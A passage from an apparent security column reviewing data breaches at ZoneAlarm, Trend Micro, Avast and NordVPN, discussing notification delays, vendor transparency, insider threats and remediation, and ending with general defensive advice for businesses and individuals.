Finally, about 4,000 users on a support forum were notified by ZoneAlarm about a data breach. The compromised data includes names, email addresses, hashed passwords, and birthdates. The cause was outdated forum software that wasn’t patched to a current version. The breach happened at least several weeks before it was noticed, and emails were sent out to affected users within 24 hours of the company figuring out the situation.

These delays are an issue for anyone. Remember, the EU, through GDPR, gives companies 72 hours to notify regulators. Those regulators have issued some pretty big fines to companies that don’t meet this deadline, such as British Airways.

Second is the question of relative transparency. Most of the vendors were very transparent about what happened and when. You’ll notice that for three out of the four situations I have linked to the vendor’s own blog post describing the breach and what they have done about it. The sole exception is ZoneAlarm, which has not posted any details publicly. The company is owned by Check Point, and while they have been very forthcoming in emails to reporters, that is still not the same as posting something online for the world to see.

Third is the fact that insider threats are real. Employees will always be the weakest link in any security strategy. With Trend, customer data (including telephone numbers but no payment data) was divulged by a rogue employee who sold the records of 68,000 customers from a support database to a criminal third party. This can happen to anyone, but you should contemplate how to make a leak such as this more difficult.

Finally, recovery, remediation and repair aren’t easy, even for the tech vendors that know what they are doing (at least most of the time). Part of the problem is first figuring out what actual harm was done, what the intruders did and what gear has to be replaced. Avast’s blog post is the most instructive of the three and is worth reading carefully. They have embarked on a major infrastructure replacement, as their CISO told me in a separate interview here. For example, they found that some of their TLS keys had been obtained but not used. Avast then revoked and reissued various encryption certificates and pushed out updates of its various software products to ensure that they hadn’t been polluted or compromised by the attackers. Both Avast and NordVPN also launched massive internal audits to track what happened and to ensure that no other parts of their computing infrastructure were affected.

But part of the problem is that our computing infrastructures have become extremely complex. Even our own personal computer applications are impossible to navigate (just try setting up your Facebook privacy options in a single sitting). How many apps does the average person use these days? Can you honestly tell me that there is no cloud login that you haven’t used since 2010 that has a breached password? Now expand that to your average small business that allows its employees to bring their personal phones to work and their company laptops home, and you have a nightmare waiting to happen: all it takes is one of your kids clicking on some dodgy link on your laptop, or you downloading an app to your phone, and it is game over. And as a friend of mine who uses a Mac found out recently, a short session on an open Wi-Fi network can infect your computer. (Macs aren’t immune, despite popular folklore.)

So I will leave you with a few words of hope. Study these breaches and use them as lessons to improve your own infosec, both corporate and personal. Treat all third-party sources of technology as if they were your own, and ask these vendors and suppliers the hard questions about their security posture. Make sure your business has a solid notification plan in place and test it regularly as part of your normal disaster recovery processes. Trust nothing at face value, and if your tech suppliers don’t measure up, find new ones that will. And as you have heard me say before, tighten up all your own logins with smartphone-based authentication apps and password managers, and use a VPN when you are on a public network.